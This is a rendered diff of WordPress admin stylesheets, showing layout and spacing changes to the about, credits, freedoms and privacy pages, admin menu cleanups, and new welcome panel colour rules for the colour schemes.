 	/* Navigation colors. */
35 35 
 	--nav-background: #fff;
 
@@ -48,14 +48,14 @@
48 48 
 .credits-php,
49 49 
 .freedoms-php,
50 50 
 .privacy-php {
51 
-	background: #f0f7ff;
51 
+	background: #fff;
52 52 
 }
53 53
54 54 
 .about-php #wpcontent,
55 55 
 .credits-php #wpcontent,
56 56 
 .freedoms-php #wpcontent,
57 57 
 .privacy-php #wpcontent {
58 
-	background: linear-gradient(180deg, #fff 50%, #f0f7ff 100%);
58 
+	background: #fff;
59 59 
 	padding: 0 24px;
60 60 
 }
61 61 
 
@@ -140,25 +140,19 @@
140 140 
 	margin: 0 0 var(--gap);
141 141 
 }
142 142
143 
-.about__section .column {
143 
+.about__section .column:not(.is-edge-to-edge) {
144 144 
 	padding: var(--gap);
145 145 
 }
146 146
147 
-.about__section + .about__section .column {
148 
-	padding-top: 0;
149 
-}
150 
-
151 147 
 .about__section + .about__section .is-section-header {
152 148 
 	padding-bottom: var(--gap);
153 149 
 }
154 150
155 151 
 .about__section .column[class*="background-color"],
152 
+.about__section:where([class*="background-color"]) .column,
156 153 
 .about__section .column.has-border {
157 154 
 	padding-top: var(--gap);
158 
-}
159 
-
160 
-.about__section .column.is-edge-to-edge {
161 
-	padding: 0;
155 
+	padding-bottom: var(--gap);
162 156 
 }
163 157
164 158 
 .about__section .column p:first-of-type {
 
@@ -214,7 +208,8 @@
214 208 
 }
215 209
216 210 
 .about__section.has-gutters {
217 
-	gap: calc(var(--gap) / 2);
211 
+	gap: var(--gap);
212 
+	margin-bottom: calc(var(--gap) * 2);
218 213 
 }
219 214
220 215 
 .about__section.has-2-columns {
 
@@ -222,11 +217,11 @@
222 217 
 }
223 218
224 219 
 .about__section.has-2-columns.is-wider-right {
225 
-	grid-template-columns: 1fr 2fr;
220 
+	grid-template-columns: 2fr 3fr;
226 221 
 }
227 222
228 223 
 .about__section.has-2-columns.is-wider-left {
229 
-	grid-template-columns: 2fr 1fr;
224 
+	grid-template-columns: 3fr 2fr;
230 225 
 }
231 226
232 227 
 .about__section.has-2-columns .is-section-header {
 
@@ -328,13 +323,24 @@
328 323 
 	.about__section.has-2-columns.is-wider-left,
329 324 
 	.about__section.has-3-columns {
330 325 
 		display: block;
331 
-		padding-bottom: calc(var(--gap) / 2);
326 
+		margin-bottom: calc(var(--gap) / 2);
327 
+	}
328 
+
329 
+	.about__section .column:not(.is-edge-to-edge) {
330 
+		padding-top: var(--gap);
331 
+		padding-bottom: var(--gap);
332 
+	}
333 
+
334 
+	.about__section.has-2-columns.has-gutters.is-wider-right,
335 
+	.about__section.has-2-columns.has-gutters.is-wider-left,
336 
+	.about__section.has-3-columns.has-gutters {
337 
+		margin-bottom: calc(var(--gap) * 2);
332 338 
 	}
333 339
334 340 
 	.about__section.has-2-columns.has-gutters .column,
335 341 
 	.about__section.has-2-columns.has-gutters .column,
336 342 
 	.about__section.has-3-columns.has-gutters .column {
337 
-		margin-bottom: calc(var(--gap) / 2);
343 
+		margin-bottom: var(--gap);
338 344 
 	}
339 345
340 346 
 	.about__section.has-2-columns.has-gutters .column:last-child,
 
@@ -393,21 +399,25 @@
393 399 
 @media screen and (max-width: 600px) {
394 400 
 	.about__section.has-2-columns {
395 401 
 		display: block;
402 
+		margin-bottom: var(--gap);
403 
+	}
404 
+
405 
+	.about__section.has-2-columns:not(.has-gutters) .column:nth-of-type(n) {
406 
+		padding-top: calc(var(--gap) / 2);
396 407 
 		padding-bottom: calc(var(--gap) / 2);
397 408 
 	}
398 409
410 
+	.about__section.has-2-columns.has-gutters {
411 
+		margin-bottom: calc(var(--gap) * 2);
412 
+	}
413 
+
399 414 
 	.about__section.has-2-columns.has-gutters .column {
400 
-		margin-bottom: calc(var(--gap) / 2);
415 
+		margin-bottom: var(--gap);
401 416 
 	}
402 417
403 418 
 	.about__section.has-2-columns.has-gutters .column:last-child {
404 419 
 		margin-bottom: 0;
405 420 
 	}
406 
-
407 
-	.about__section.has-2-columns .column:nth-of-type(n) {
408 
-		padding-top: calc(var(--gap) / 2);
409 
-		padding-bottom: calc(var(--gap) / 2);
410 
-	}
411 421 
 }
412 422
413 423 
 @media screen and (max-width: 480px) {
 
@@ -451,18 +461,18 @@
451 461 
 .about__container h3.is-larger-heading {
452 462 
 	margin-top: 0;
453 463 
 	margin-bottom: 0.5em;
454 
-	font-size: 2em;
455 
-	line-height: 1.2;
464 
+	font-size: 2rem;
456 465 
 	font-weight: 700;
466 
+	line-height: 1.16;
457 467 
 }
458 468
459 469 
 .about__container h3,
460 470 
 .about__container h1.is-smaller-heading,
461 471 
 .about__container h2.is-smaller-heading {
462 472 
 	margin-top: 0;
463 
-	font-size: 1.6em;
464 
-	line-height: 1.3;
465 
-	font-weight: 400;
473 
+	font-size: 1.625rem;
474 
+	font-weight: 700;
475 
+	line-height: 1.4;
466 476 
 }
467 477
468 478 
 .about__container p {
 
@@ -470,6 +480,13 @@
470 480 
 	line-height: inherit;
471 481 
 }
472 482
483 
+.about__container p.is-subheading {
484 
+	margin-top: 0;
485 
+	font-size: 1.5rem;
486 
+	font-weight: 300;
487 
+	line-height: 160%;
488 
+}
489 
+
473 490 
 .about__section a {
474 491 
 	color: var(--accent-1);
475 492 
 	text-decoration: underline;
 
@@ -497,6 +514,10 @@
497 514 
 	margin-left: calc(var(--gap) / 2);
498 515 
 }
499 516
517 
+.about__container li {
518 
+	margin-bottom: 0.75rem;
519 
+}
520 
+
500 521 
 .about__container img {
501 522 
 	margin: 0;
502 523 
 	max-width: 100%;
 
@@ -523,50 +544,14 @@
523 544 
 	margin-right: auto;
524 545 
 }
525 546
526 
-.about__container .about__image-comparison {
527 
-	position: relative;
528 
-	display: inline-block;
529 
-	max-width: 100%;
530 
-}
531 
-
532 
-.about__container .about__image-comparison img {
533 
-	-webkit-user-select: none;
534 
-	user-select: none;
535 
-	width: auto;
536 
-	max-width: none;
537 
-	max-height: 100%;
538 
-}
539 
-
540 
-.about__container .about__image-comparison > img {
541 
-	max-width: 100%;
542 
-}
543 
-
544 
-.about__container .about__image-comparison-resize {
545 
-	position: absolute !important; /* Needed to override inline style on ResizableBox */
546 
-	top: 0;
547 
-	bottom: 0;
548 
-	left: 0;
549 
-	width: 50%;
550 
-	max-width: 100%;
551 
-}
552 
-
553 
-.about__container .about__image-comparison.no-js .about__image-comparison-resize {
554 
-	overflow: hidden;
555 
-	border-right: 2px solid var(--wp-admin-theme-color);
556 
-}
557 
-
558 
-.about__container .about__image-comparison-resize .components-resizable-box__side-handle::before {
559 
-	width: 4px;
560 
-	right: calc(50% - 2px);
561 
-	transition: none;
562 
-	animation: none;
563 
-	opacity: 1;
564 
-}
565 
-
566 547 
 .about__container .about__image + h3 {
567 548 
 	margin-top: 1.5em;
568 549 
 }
569 550
551 
+.about__container .column .about__image {
552 
+	margin-bottom: calc(var(--gap) / 2);
553 
+}
554 
+
570 555 
 .about__container hr {
571 556 
 	margin: 0;
572 557 
 	height: var(--gap);
 
@@ -589,7 +574,8 @@
589 574 
 }
590 575
591 576 
 .about__section {
592 
-	font-size: 1.2em;
577 
+	font-size: 1.125rem;
578 
+	line-height: 1.55;
593 579 
 }
594 580
595 581 
 .about__section.is-feature {
 
@@ -611,26 +597,45 @@
611 597 
 /* 1.3 - Header */
612 598
613 599 
 .about__header {
600 
+	--about-header-image-width: 521px;
601 
+	--about-header-image-height: 504px;
602 
+	--about-header-bg-width: var(--about-header-image-width);
603 
+	--about-header-bg-height: var(--about-header-image-height);
604 
+	--about-header-bg-offset-inline: calc(var(--gap) * -2);
605 
+
606 
+	position: relative;
614 607 
 	margin-bottom: var(--gap);
615 608 
 	padding-top: 0;
616 
-	background-position: center;
617 
-	background-repeat: no-repeat;
618 
-	background-size: cover;
619 
-	background-image: url('../images/about-header-about.svg');
620 
-	background-color: var(--accent-2);
621 
-	color: var(--text-light);
609 
+	background: var(--subtle-background) url('../images/about-header-about.svg?ver=6.0') no-repeat;
610 
+	background-size: var(--about-header-bg-width) var(--about-header-bg-height);
611 
+	background-position: right var(--about-header-bg-offset-inline) center;
622 612 
 }
623 613
624 614 
 .credits-php .about__header {
625 
-	background-image: url('../images/about-header-credits.svg');
615 
+	--about-header-image-width: 477px;
616 
+	--about-header-image-height: 470px;
617 
+	--about-header-bg-offset-inline: calc(var(--gap) * -4);
618 
+
619 
+	background-image: url('../images/about-header-credits.svg?ver=6.0');
620 
+	background-position: right var(--about-header-bg-offset-inline) top var(--gap);
626 621 
 }
627 622
628 623 
 .freedoms-php .about__header {
629 
-	background-image: url('../images/about-header-freedoms.svg');
624 
+	--about-header-image-width: 411px;
625 
+	--about-header-image-height: 498px;
626 
+	--about-header-bg-offset-inline: var(--gap);
627 
+
628 
+	background-image: url('../images/about-header-freedoms.svg?ver=6.0');
629 
+	background-position: right var(--about-header-bg-offset-inline) top calc(var(--gap) * 4);
630 630 
 }
631 631
632 632 
 .privacy-php .about__header {
633 
-	background-image: url('../images/about-header-privacy.svg');
633 
+	--about-header-image-width: 277px;
634 
+	--about-header-image-height: 361px;
635 
+	--about-header-bg-offset-inline: var(--gap);
636 
+
637 
+	background-image: url('../images/about-header-privacy.svg?ver=6.0');
638 
+	background-position: right var(--about-header-bg-offset-inline) top var(--gap);
634 639 
 }
635 640
636 641 
 .about__header-image {
 
@@ -638,27 +643,50 @@
638 643 
 }
639 644
640 645 
 .about__header-title {
641 
-	padding: 2rem 0 0;
642 
-	margin: 0 2rem;
646 
+	box-sizing: border-box;
647 
+	margin: 0 0 0 var(--gap);
648 
+	padding: 8rem 0 0;
649 
+	padding-right: calc(var(--about-header-bg-width) + var(--about-header-bg-offset-inline) + var(--gap));
650 
+}
651 
+
652 
+.credits-php .about__header-title,
653 
+.privacy-php .about__header-title {
654 
+	padding-top: 6rem;
655 
+}
656 
+
657 
+.freedoms-php .about__header-title {
658 
+	padding-top: 3rem;
643 659 
 }
644 660
645 661 
 .about__header-title h1 {
646 
-	margin: 0 0 0.5rem;
662 
+	margin: 0 0 1rem;
647 663 
 	padding: 0;
648 
-	font-size: 4.5rem;
664 
+	font-size: clamp(3rem, 18.46vw - 8.08rem, 6rem);
649 665 
 	line-height: 1;
650 666 
 	font-weight: 400;
651 667 
 }
652 668
653 669 
 .about__header-text {
654 
-	max-width: 42rem;
655 
-	margin: 0 0 5em;
656 
-	padding: 0 2rem;
657 
-	font-size: 2rem;
670 
+	box-sizing: border-box;
671 
+	margin: 0 0 9rem;
672 
+	padding: 0 0 0 2rem;
673 
+	padding-right: calc(var(--about-header-bg-width) + var(--about-header-bg-offset-inline) + var(--gap));
674 
+	font-size: 1.6rem;
658 675 
 	line-height: 1.15;
659 676 
 }
660 677
678 
+.credits-php .about__header-text,
679 
+.privacy-php .about__header-text {
680 
+	margin-bottom: 7rem;
681 
+}
682 
+
683 
+.freedoms-php .about__header-text {
684 
+	margin-bottom: 6rem;
685 
+}
686 
+
661 687 
 .about__header-navigation {
688 
+	position: relative;
689 
+	z-index: 1;
662 690 
 	display: flex;
663 691 
 	justify-content: center;
664 692 
 	padding-top: 0;
 
@@ -700,9 +728,15 @@
700 728 
 	border-color: var(--nav-current);
701 729 
 }
702 730
703 
-@media screen and (max-width: 960px){
731 
+@media screen and (max-width: 960px) {
732 
+	.about__header {
733 
+		--about-header-bg-width: calc(var(--about-header-image-width) * 0.7);
734 
+		--about-header-bg-height: calc(var(--about-header-image-height) * 0.7);
735 
+		--about-header-bg-offset-inline: calc(var(--gap) * -1);
736 
+	}
737 
+
704 738 
 	.about__header-title h1 {
705 
-		font-size: 4.8em;
739 
+		font-size: clamp(3rem, 18.46vw - 5.08rem, 6rem);
706 740 
 	}
707 741 
 }
708 742 
 
@@ -721,7 +755,12 @@
721 755 
 		margin-right: calc(var(--gap) / 2);
722 756 
 	}
723 757
724 
-	.about__header-text,
758 
+	.about__header-text {
759 
+		margin-top: 0;
760 
+		margin-right: 0;
761 
+		padding-left: calc(var(--gap) / 2);
762 
+	}
763 
+
725 764 
 	.about__header-navigation .nav-tab {
726 765 
 		margin-top: 0;
727 766 
 		margin-right: 0;
 
@@ -730,13 +769,35 @@
730 769 
 	}
731 770 
 }
732 771
772 
+@media screen and (max-width: 600px) {
773 
+	.about__header,
774 
+	.credits-php .about__header,
775 
+	.privacy-php .about__header,
776 
+	.freedoms-php .about__header {
777 
+		background-image: none;
778 
+	}
779 
+
780 
+	.about__header-title,
781 
+	.about__header-text {
782 
+		padding-right: calc(var(--gap) / 2) !important;
783 
+	}
784 
+
785 
+	.about__header-title h1 {
786 
+		font-size: clamp(2rem, 11.43vw - 0.29rem, 4rem);
787 
+	}
788 
+}
789 
+
733 790 
 @media screen and (max-width: 480px) {
734 791 
 	.about__header-title p {
735 792 
 		font-size: 2.4em;
736 793 
 	}
737 794
795 
+	.about__header-title {
796 
+		padding-top: 2rem;
797 
+	}
798 
+
738 799 
 	.about__header-text {
739 
-		margin-bottom: 1em;
800 
+		margin-bottom: 2rem;
740 801 
 	}
741 802
742 803 
 	.about__header-navigation {

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/about.min.css


+ 5 - 6
app/wp-admin/css/admin-menu-rtl.css
Ver Arquivo 

@@ -40,7 +40,7 @@
40 40 
 .icon16 {
41 41 
 	height: 18px;
42 42 
 	width: 18px;
43 
-	padding: 6px 6px;
43 
+	padding: 6px;
44 44 
 	margin: -6px -8px 0 0;
45 45 
 	float: right;
46 46 
 }
 
@@ -162,7 +162,6 @@
162 162 
 #adminmenu li {
163 163 
 	margin: 0;
164 164 
 	padding: 0;
165 
-	cursor: pointer;
166 165 
 }
167 166
168 167 
 #adminmenu a {
 
@@ -346,7 +345,7 @@
346 345 
 }
347 346
348 347 
 #adminmenu .wp-menu-image img {
349 
-	padding: 9px 0 0 0;
348 
+	padding: 9px 0 0;
350 349 
 	opacity: 0.6;
351 350 
 	filter: alpha(opacity=60);
352 351 
 }
 
@@ -489,7 +488,7 @@ ul#adminmenu > li.current > a.current:after {
489 488 
 #adminmenu li.wp-menu-separator {
490 489 
 	height: 5px;
491 490 
 	padding: 0;
492 
-	margin: 0 0 6px 0;
491 
+	margin: 0 0 6px;
493 492 
 	cursor: inherit;
494 493 
 }
495 494 
 
@@ -504,7 +503,7 @@ ul#adminmenu > li.current > a.current:after {
504 503 
 	font-weight: 400;
505 504 
 	font-size: 14px;
506 505 
 	padding: 5px 11px 5px 4px;
507 
-	margin: -7px -5px 4px 0px;
506 
+	margin: -7px -5px 4px 0;
508 507 
 	border-width: 3px 5px 3px 0;
509 508 
 	border-style: solid;
510 509 
 	border-color: transparent;
 
@@ -655,7 +654,7 @@ li#wp-admin-bar-menu-toggle {
655 654 
 	.auto-fold #adminmenu .wp-has-current-submenu.opensub .wp-submenu,
656 655 
 	.auto-fold #adminmenu a.menu-top:focus + .wp-submenu,
657 656 
 	.auto-fold #adminmenu .wp-has-current-submenu a.menu-top:focus + .wp-submenu {
658 
-		top: 0px;
657 
+		top: 0;
659 658 
 		right: 36px;
660 659 
 	}
661 660

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/admin-menu-rtl.min.css


+ 5 - 6
app/wp-admin/css/admin-menu.css
Ver Arquivo 

@@ -39,7 +39,7 @@
39 39 
 .icon16 {
40 40 
 	height: 18px;
41 41 
 	width: 18px;
42 
-	padding: 6px 6px;
42 
+	padding: 6px;
43 43 
 	margin: -6px 0 0 -8px;
44 44 
 	float: left;
45 45 
 }
 
@@ -161,7 +161,6 @@
161 161 
 #adminmenu li {
162 162 
 	margin: 0;
163 163 
 	padding: 0;
164 
-	cursor: pointer;
165 164 
 }
166 165
167 166 
 #adminmenu a {
 
@@ -345,7 +344,7 @@
345 344 
 }
346 345
347 346 
 #adminmenu .wp-menu-image img {
348 
-	padding: 9px 0 0 0;
347 
+	padding: 9px 0 0;
349 348 
 	opacity: 0.6;
350 349 
 	filter: alpha(opacity=60);
351 350 
 }
 
@@ -488,7 +487,7 @@ ul#adminmenu > li.current > a.current:after {
488 487 
 #adminmenu li.wp-menu-separator {
489 488 
 	height: 5px;
490 489 
 	padding: 0;
491 
-	margin: 0 0 6px 0;
490 
+	margin: 0 0 6px;
492 491 
 	cursor: inherit;
493 492 
 }
494 493 
 
@@ -503,7 +502,7 @@ ul#adminmenu > li.current > a.current:after {
503 502 
 	font-weight: 400;
504 503 
 	font-size: 14px;
505 504 
 	padding: 5px 4px 5px 11px;
506 
-	margin: -7px 0px 4px -5px;
505 
+	margin: -7px 0 4px -5px;
507 506 
 	border-width: 3px 0 3px 5px;
508 507 
 	border-style: solid;
509 508 
 	border-color: transparent;
 
@@ -654,7 +653,7 @@ li#wp-admin-bar-menu-toggle {
654 653 
 	.auto-fold #adminmenu .wp-has-current-submenu.opensub .wp-submenu,
655 654 
 	.auto-fold #adminmenu a.menu-top:focus + .wp-submenu,
656 655 
 	.auto-fold #adminmenu .wp-has-current-submenu a.menu-top:focus + .wp-submenu {
657 
-		top: 0px;
656 
+		top: 0;
658 657 
 		left: 36px;
659 658 
 	}
660 659

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/admin-menu.min.css


+ 1 - 1
app/wp-admin/css/color-picker-rtl.css
Ver Arquivo 

@@ -12,7 +12,7 @@
12 12 
 /* Needs higher specificiity. */
13 13 
 .wp-picker-container .wp-color-result.button {
14 14 
 	min-height: 30px;
15 
-	margin: 0 0px 6px 6px;
15 
+	margin: 0 0 6px 6px;
16 16 
 	padding: 0 30px 0 0;
17 17 
 	font-size: 11px;
18 18 
 }

+ 1 - 1
app/wp-admin/css/color-picker.css
Ver Arquivo 

@@ -11,7 +11,7 @@
11 11 
 /* Needs higher specificiity. */
12 12 
 .wp-picker-container .wp-color-result.button {
13 13 
 	min-height: 30px;
14 
-	margin: 0 6px 6px 0px;
14 
+	margin: 0 6px 6px 0;
15 15 
 	padding: 0 0 0 30px;
16 16 
 	font-size: 11px;
17 17 
 }

+ 17 - 0
app/wp-admin/css/colors/_admin.scss
Ver Arquivo 

@@ -781,3 +781,20 @@ div#wp-responsive-toggle a:before {
781 781 
 		color: $link;
782 782 
 	}
783 783 
 }
784 
+
785 
+/* Welcome Panel */
786 
+.welcome-panel {
787 
+	background-color: mix($dashboard-accent-1, white, 12%);
788 
+}
789 
+
790 
+.welcome-panel-header-image .about-six {
791 
+	fill: $dashboard-accent-1;
792 
+}
793 
+
794 
+.welcome-panel-header-image .about-zero {
795 
+	fill: $dashboard-accent-2;
796 
+}
797 
+
798 
+[class*="welcome-panel-icon"] {
799 
+	background-color: $dashboard-icon-background;
800 
+}

+ 7 - 0
app/wp-admin/css/colors/_variables.scss
Ver Arquivo 

@@ -1,5 +1,6 @@
1 1 
 // assign default value to all undefined variables
2 2
3 
+$scheme-name: "default" !default;
3 4
4 5 
 // core variables
5 6 
 
@@ -62,4 +63,10 @@ $adminbar-recovery-exit-background-alt: mix(black, $adminbar-recovery-exit-backg
62 63
63 64 
 $menu-customizer-text: mix( $base-color, $text-color, 40% ) !default;
64 65
66 
+// Dashboard Colors
67 
+
68 
+$dashboard-accent-1: $highlight-color !default;
69 
+$dashboard-accent-2: $base-color !default;
70 
+$dashboard-icon-background: $dashboard-accent-2 !default;
71 
+
65 72 
 $low-contrast-theme: "false" !default;

+ 17 - 0
app/wp-admin/css/colors/blue/colors-rtl.css
Ver Arquivo 

@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702 
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703 
   border-bottom-color: #e1a948;
704 704 
   color: #0073aa;
705 
+}
706 
+
707 
+/* Welcome Panel */
708 
+.welcome-panel {
709 
+  background-color: #e1ecf0;
710 
+}
711 
+
712 
+.welcome-panel-header-image .about-six {
713 
+  fill: #096484;
714 
+}
715 
+
716 
+.welcome-panel-header-image .about-zero {
717 
+  fill: #52accc;
718 
+}
719 
+
720 
+[class*=welcome-panel-icon] {
721 
+  background-color: #096484;
705 722 
 }

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/colors/blue/colors-rtl.min.css


+ 17 - 0
app/wp-admin/css/colors/blue/colors.css
Ver Arquivo 

@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702 
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703 
   border-bottom-color: #e1a948;
704 704 
   color: #0073aa;
705 
+}
706 
+
707 
+/* Welcome Panel */
708 
+.welcome-panel {
709 
+  background-color: #e1ecf0;
710 
+}
711 
+
712 
+.welcome-panel-header-image .about-six {
713 
+  fill: #096484;
714 
+}
715 
+
716 
+.welcome-panel-header-image .about-zero {
717 
+  fill: #52accc;
718 
+}
719 
+
720 
+[class*=welcome-panel-icon] {
721 
+  background-color: #096484;
705 722 
 }

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/colors/blue/colors.min.css


+ 3 - 0
app/wp-admin/css/colors/blue/colors.scss
Ver Arquivo 

@@ -1,3 +1,4 @@
1 
+$scheme-name: "blue";
1 2 
 $base-color: #52accc;
2 3 
 $icon-color: #e5f8ff;
3 4 
 $highlight-color: #096484;
 
@@ -8,4 +9,6 @@ $menu-submenu-text: #e2ecf1;
8 9 
 $menu-submenu-focus-text: #fff;
9 10 
 $menu-submenu-background: #4796b3;
10 11
12 
+$dashboard-icon-background: $highlight-color;
13 
+
11 14 
 @import "../_admin.scss";

+ 26 - 9
app/wp-admin/css/colors/coffee/colors-rtl.css
Ver Arquivo 

@@ -167,7 +167,7 @@ textarea:focus {
167 167 
   color: #9ea476;
168 168 
 }
169 169 
 .wp-core-ui .wp-ui-text-icon {
170 
-  color: #f3f2f1;
170 
+  color: hsl(27.6923076923deg, 7%, 95%);
171 171 
 }
172 172
173 173 
 /* List tables */
 
@@ -196,7 +196,7 @@ textarea:focus {
196 196 
 }
197 197
198 198 
 #adminmenu div.wp-menu-image:before {
199 
-  color: #f3f2f1;
199 
+  color: hsl(27.6923076923deg, 7%, 95%);
200 200 
 }
201 201
202 202 
 #adminmenu a:hover,
 
@@ -308,7 +308,7 @@ ul#adminmenu > li.current > a.current:after {
308 308
309 309 
 /* Admin Menu: collapse button */
310 310 
 #collapse-button {
311 
-  color: #f3f2f1;
311 
+  color: hsl(27.6923076923deg, 7%, 95%);
312 312 
 }
313 313
314 314 
 #collapse-button:hover,
 
@@ -333,7 +333,7 @@ ul#adminmenu > li.current > a.current:after {
333 333 
 #wpadminbar .ab-icon:before,
334 334 
 #wpadminbar .ab-item:before,
335 335 
 #wpadminbar .ab-item:after {
336 
-  color: #f3f2f1;
336 
+  color: hsl(27.6923076923deg, 7%, 95%);
337 337 
 }
338 338
339 339 
 #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item,
 
@@ -377,7 +377,7 @@ ul#adminmenu > li.current > a.current:after {
377 377
378 378 
 #wpadminbar .quicklinks li .blavatar,
379 379 
 #wpadminbar .menupop .menupop > .ab-item:before {
380 
-  color: #f3f2f1;
380 
+  color: hsl(27.6923076923deg, 7%, 95%);
381 381 
 }
382 382
383 383 
 #wpadminbar .quicklinks .menupop ul li a:hover,
 
@@ -412,12 +412,12 @@ ul#adminmenu > li.current > a.current:after {
412 412
413 413 
 #wpadminbar.mobile .quicklinks .hover .ab-icon:before,
414 414 
 #wpadminbar.mobile .quicklinks .hover .ab-item:before {
415 
-  color: #f3f2f1;
415 
+  color: hsl(27.6923076923deg, 7%, 95%);
416 416 
 }
417 417
418 418 
 /* Admin Bar: search */
419 419 
 #wpadminbar #adminbarsearch:before {
420 
-  color: #f3f2f1;
420 
+  color: hsl(27.6923076923deg, 7%, 95%);
421 421 
 }
422 422
423 423 
 #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus {
 
@@ -553,7 +553,7 @@ body.more-filters-opened .more-filters:focus:before {
553 553
554 554 
 /* Responsive Component */
555 555 
 div#wp-responsive-toggle a:before {
556 
-  color: #f3f2f1;
556 
+  color: hsl(27.6923076923deg, 7%, 95%);
557 557 
 }
558 558
559 559 
 .wp-responsive-open div#wp-responsive-toggle a {
 
@@ -566,7 +566,7 @@ div#wp-responsive-toggle a:before {
566 566 
 }
567 567
568 568 
 .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before {
569 
-  color: #f3f2f1;
569 
+  color: hsl(27.6923076923deg, 7%, 95%);
570 570 
 }
571 571
572 572 
 /* TinyMCE */
 
@@ -669,4 +669,21 @@ div#wp-responsive-toggle a:before {
669 669 
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
670 670 
   border-bottom-color: #c7a589;
671 671 
   color: #0073aa;
672 
+}
673 
+
674 
+/* Welcome Panel */
675 
+.welcome-panel {
676 
+  background-color: #f8f4f1;
677 
+}
678 
+
679 
+.welcome-panel-header-image .about-six {
680 
+  fill: #c7a589;
681 
+}
682 
+
683 
+.welcome-panel-header-image .about-zero {
684 
+  fill: #59524c;
685 
+}
686 
+
687 
+[class*=welcome-panel-icon] {
688 
+  background-color: #59524c;
672 689 
 }

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/colors/coffee/colors-rtl.min.css


+ 26 - 9
app/wp-admin/css/colors/coffee/colors.css
Ver Arquivo 

@@ -167,7 +167,7 @@ textarea:focus {
167 167 
   color: #9ea476;
168 168 
 }
169 169 
 .wp-core-ui .wp-ui-text-icon {
170 
-  color: #f3f2f1;
170 
+  color: hsl(27.6923076923deg, 7%, 95%);
171 171 
 }
172 172
173 173 
 /* List tables */
 
@@ -196,7 +196,7 @@ textarea:focus {
196 196 
 }
197 197
198 198 
 #adminmenu div.wp-menu-image:before {
199 
-  color: #f3f2f1;
199 
+  color: hsl(27.6923076923deg, 7%, 95%);
200 200 
 }
201 201
202 202 
 #adminmenu a:hover,
 
@@ -308,7 +308,7 @@ ul#adminmenu > li.current > a.current:after {
308 308
309 309 
 /* Admin Menu: collapse button */
310 310 
 #collapse-button {
311 
-  color: #f3f2f1;
311 
+  color: hsl(27.6923076923deg, 7%, 95%);
312 312 
 }
313 313
314 314 
 #collapse-button:hover,
 
@@ -333,7 +333,7 @@ ul#adminmenu > li.current > a.current:after {
333 333 
 #wpadminbar .ab-icon:before,
334 334 
 #wpadminbar .ab-item:before,
335 335 
 #wpadminbar .ab-item:after {
336 
-  color: #f3f2f1;
336 
+  color: hsl(27.6923076923deg, 7%, 95%);
337 337 
 }
338 338
339 339 
 #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item,
 
@@ -377,7 +377,7 @@ ul#adminmenu > li.current > a.current:after {
377 377
378 378 
 #wpadminbar .quicklinks li .blavatar,
379 379 
 #wpadminbar .menupop .menupop > .ab-item:before {
380 
-  color: #f3f2f1;
380 
+  color: hsl(27.6923076923deg, 7%, 95%);
381 381 
 }
382 382
383 383 
 #wpadminbar .quicklinks .menupop ul li a:hover,
 
@@ -412,12 +412,12 @@ ul#adminmenu > li.current > a.current:after {
412 412
413 413 
 #wpadminbar.mobile .quicklinks .hover .ab-icon:before,
414 414 
 #wpadminbar.mobile .quicklinks .hover .ab-item:before {
415 
-  color: #f3f2f1;
415 
+  color: hsl(27.6923076923deg, 7%, 95%);
416 416 
 }
417 417
418 418 
 /* Admin Bar: search */
419 419 
 #wpadminbar #adminbarsearch:before {
420 
-  color: #f3f2f1;
420 
+  color: hsl(27.6923076923deg, 7%, 95%);
421 421 
 }
422 422
423 423 
 #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus {
 
@@ -553,7 +553,7 @@ body.more-filters-opened .more-filters:focus:before {
553 553
554 554 
 /* Responsive Component */
555 555 
 div#wp-responsive-toggle a:before {
556 
-  color: #f3f2f1;
556 
+  color: hsl(27.6923076923deg, 7%, 95%);
557 557 
 }
558 558
559 559 
 .wp-responsive-open div#wp-responsive-toggle a {
 
@@ -566,7 +566,7 @@ div#wp-responsive-toggle a:before {
566 566 
 }
567 567
568 568 
 .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before {
569 
-  color: #f3f2f1;
569 
+  color: hsl(27.6923076923deg, 7%, 95%);
570 570 
 }
571 571
572 572 
 /* TinyMCE */
 
@@ -669,4 +669,21 @@ div#wp-responsive-toggle a:before {
669 669 
